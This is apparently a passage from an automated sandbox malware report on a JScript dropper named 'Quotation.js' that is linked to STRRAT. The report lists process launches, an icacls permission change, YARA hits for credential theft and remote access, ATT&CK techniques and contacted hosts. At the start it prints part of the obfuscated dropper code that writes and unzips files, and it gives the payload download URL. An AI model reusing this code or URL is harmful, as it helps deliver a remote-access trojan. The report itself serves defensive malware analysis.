EL[CklqdFL[76]];}function writeBytes(file, bytes){var ChoQAUCA_b = WScript[CklqdFL[47]](CklqdFL[41]);ChoQAUCA_b[CklqdFL[65]] = 1;ChoQAUCA_b[CklqdFL[79]]();ChoQAUCA_b[CklqdFL[80]](bytes);ChoQAUCA_b[CklqdFL[81]](file, 2);}function UnZip(zipfile, ExtractTo){if(PajvHKk$Px[CklqdFL[82]](zipfile) == CklqdFL[42]){if(!PajvHKk$Px[CklqdFL[83]](ExtractTo)){PajvHKk$Px[CklqdFL[84]](ExtractTo);}var ILFMGamxnA = WScript[CklqdFL[47]](CklqdFL[43]);var KPDuuaFk_S = ILFMGamxnA[CklqdFL[86]](ExtractTo);var kO_atSzV$m = ILFMGamxnA[CklqdFL[86]](zipfile)[CklqdFL[88]]();for(i = 0; i < kO_atSzV$m[CklqdFL[89]]; i++){if(PajvHKk$Px[CklqdFL[90]](PajvHKk$Px[CklqdFL[91]](ExtractTo,kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[93]])+CklqdFL[44]+PajvHKk$Px[CklqdFL[94]](kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[96]]))){PajvHKk$Px[CklqdFL[97]](PajvHKk$Px[CklqdFL[91]](ExtractTo,kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[93]])+CklqdFL[44]+PajvHKk$Px[CklqdFL[94]](kO_atSzV$m[CklqdFL[92]](i)[CklqdFL[96]]));}KPDuuaFk_S[CklqdFL[104]](kO_atSzV$m[CklqdFL[92]](i), 20);}}}IHost.CreateObject("adodb.stream");IHost.CreateObj
        Source: Yara matchFile source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAD8F7 push 00000000h; mov dword ptr [esp], esp1_2_02EAD921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAA20A push ecx; ret 1_2_02EAA21A
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAA21B push ecx; ret 1_2_02EAA225
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAB3B7 push 00000000h; mov dword ptr [esp], esp1_2_02EAB3DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EABB67 push 00000000h; mov dword ptr [esp], esp1_2_02EABB8D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAD8D1 push 00000000h; mov dword ptr [esp], esp1_2_02EAD921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAB947 push 00000000h; mov dword ptr [esp], esp1_2_02EAB96D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EAC477 push 00000000h; mov dword ptr [esp], esp1_2_02EAC49D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02F49091 push cs; retf 1_2_02F490B1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: javaw.exe, 00000001.00000002.2980713081.0000000001488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Ljava/lang/VirtualMachineError;
        Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
        Source: javaw.exe, 00000001.00000002.2980713081.0000000001488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
        Source: javaw.exe, 00000001.00000003.1720662318.00000000154CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
        Source: javaw.exe, 00000001.00000002.2980713081.0000000001488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeMemory protected: page read and write | page guardJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeCode function: 1_2_02EA03C0 cpuid 1_2_02EA03C0
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersionJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersionJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7588 VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeQueries volume information: C:\Users\user\3608lock.file VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: javaw.exe PID: 7588, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information12
        Scripting
        Valid AccountsWindows Management Instrumentation12
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Services File Permissions Weakness
        1
        Services File Permissions Weakness
        1
        Disable or Modify Tools
        LSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Process Injection
        Security Account Manager32
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Services File Permissions Weakness
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Quotation.js18%ReversingLabsScript-JS.Trojan.Heuristic
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://wshsoft.company/jv/jrex.zipnf0%Avira URL Cloudsafe
        https://repo1.mave0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        github.com
        20.233.83.145
        truefalse
          high
          dualstack.sonatype.map.fastly.net
          199.232.192.209
          truefalse
            high
            repo1.maven.org
            unknown
            unknownfalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.xrampsecurity.com/XGCA.crljavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarjavaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://repo1.mavejavaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.chambersign.org/chambersroot.crl0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.comjavaw.exe, 00000001.00000002.2981310516.000000000508C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005159000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://repository.luxtrust.lu0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://bugreport.sun.com/bugreport/javaw.exe, 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://cps.chambersign.org/cps/chambersroot.html0javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://java.oracle.com/javaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://null.oracle.com/javaw.exe, 00000001.00000002.2988463931.0000000015B9A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936252909.0000000015B7B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1774418678.0000000015B72000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2936715902.0000000015B93000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.chambersign.org1javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://repository.swisssign.com/0javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jarjavaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989008162.0000000016059000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989078586.00000000160EA000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2980872495.0000000001668000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2988964468.0000000015FC8000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2989156025.0000000016179000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://policy.camerfirma.comjavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ocsp.quovadisoffshore.comjavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarjavaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A550000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.securetrust.com/STCA.crl0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.quovadisglobal.com/cpsjavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.securetrust.com/STCA.crljavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://repo1.maven.orgjavaw.exe, 00000001.00000002.2981310516.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005381000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000500A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005136000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.000000000518C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000051B1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005396000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.00000000052DC000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2981310516.0000000005148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://repository.luxtrust.lujavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://wshsoft.company/jv/jrex.zipnfwscript.exe, 00000000.00000003.1721139336.00000252C4DF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.quovadisglobal.com/cps0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jararjavaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.xrampsecurity.com/XGCA.crl0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.quovadis.bmjavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.quovadis.bm0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://wshsoft.company/jv/jrex.zipwscript.exe, 00000000.00000003.1710702029.00000252C3038000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ocsp.quovadisoffshore.com0javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A70D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.allatori.comjavaw.exe, 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.chambersign.org/chambersroot.crljavaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://repository.swisssign.com/javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.chambersign.orgjavaw.exe, 00000001.00000002.2982954889.000000000A992000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2982954889.000000000A78D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jarjavaw.exe, 00000001.00000002.2981310516.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://policy.camerfirma.com0javaw.exe, 00000001.00000002.2982954889.000000000A862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  199.232.192.209
                                                                                  dualstack.sonatype.map.fastly.netUnited States
                                                                                  54113FASTLYUSfalse
                                                                                  20.233.83.145
                                                                                  github.comUnited States
                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1562892
                                                                                  Start date and time:2024-11-26 09:02:33 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 47s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Run name:Without Instrumentation
                                                                                  Number of analysed new started processes analysed:8
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Quotation.js
                                                                                  Detection:MAL
                                                                                  Classification:mal92.troj.evad.winJS@6/4@5/2
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 69%
                                                                                  • Number of executed functions: 13
                                                                                  • Number of non-executed functions: 1
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .js
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target javaw.exe, PID 7588 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                  • VT rate limit hit for: Quotation.js
                                                                                  No simulations
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  199.232.192.209RFQ AE 3003910999.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                    Bestellung EB0072813.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                      kIMPADTn5g.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                        SWIFT-MT103-17112024.jsGet hashmaliciousSTRRATBrowse
                                                                                          YPcqnc0z06.jsGet hashmaliciousSTRRATBrowse
                                                                                            Proof of payment.jsGet hashmaliciousSTRRATBrowse
                                                                                              Tax Returns Of R38,765.jsGet hashmaliciousSTRRATBrowse
                                                                                                Tax Returns Of R38,765.jsGet hashmaliciousSTRRATBrowse
                                                                                                  8NR95Z54o9.jsGet hashmaliciousSTRRATBrowse
                                                                                                    20.233.83.145xeno.batGet hashmaliciousUnknownBrowse
                                                                                                      RFQ AE 3003910999.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                        Bestellung EB0072813.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                          file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                            bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                              y.batGet hashmaliciousBraodoBrowse
                                                                                                                bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                  https://linkchainsfix.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    dualstack.sonatype.map.fastly.netRFQ AE 3003910999.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                    • 199.232.192.209
                                                                                                                    Bestellung EB0072813.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                    • 199.232.192.209
                                                                                                                    kIMPADTn5g.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                    • 199.232.192.209
                                                                                                                    SWIFT-MT103-17112024.jsGet hashmaliciousSTRRATBrowse
                                                                                                                    • 199.232.196.209
                                                                                                                    SWIFT-MT103-17112024.jsGet hashmaliciousSTRRATBrowse
                                                                                                                    • 199.232.192.209
                                                                                                                    LYDI9MoZyu.jsGet hashmaliciousSTRRATBrowse
                                                                                                                    • 199.232.196.209
                                                                                                                    YPcqnc0z06.jsGet hashmaliciousSTRRATBrowse
                                                                                                                    • 199.232.196.209
                                                                                                                    LYDI9MoZyu.jsGet hashmaliciousSTRRATBrowse
                                                                                                                    • 199.232.196.209
                                                                                                                    Proof of payment.jsGet hashmaliciousSTRRATBrowse
                                                                                                                    • 199.232.196.209
                                                                                                                    github.comxeno.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    RFQ AE 3003910999.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    Bestellung EB0072813.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    y.batGet hashmaliciousBraodoBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                    • 20.233.83.145
                                                                                                                    https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 140.82.121.4
                                                                                                                    kIMPADTn5g.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                    • 140.82.121.3
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    FASTLYUSINVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 185.199.108.153
                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                    • 151.101.1.91
                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                    • 151.101.193.91
                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                    • 151.101.1.91
                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                    • 151.101.193.91
                                                                                                                    Finish_Agreement_DocuSign.pdfGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.66.137
                                                                                                                    http://www.btc1yby.blogspot.rs/Get hashmaliciousGRQ ScamBrowse
                                                                                                                    • 151.101.66.208
                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                    • 151.101.193.91
                                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                    • 151.101.193.91
                                                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUS9oKqST-uPDy7iigkXM-C5J2.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.113.195.132
                                                                                                                    jlPBMMQbXC.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                    • 13.107.136.10
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 204.79.197.203
                                                                                                                    file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                    • 23.101.168.44
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 13.107.246.63
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 20.75.60.91
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 94.245.104.56
                                                                                                                    FW Expiration Pending Support Care HIPAA Acknowledgement Form 2024.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 52.109.76.243
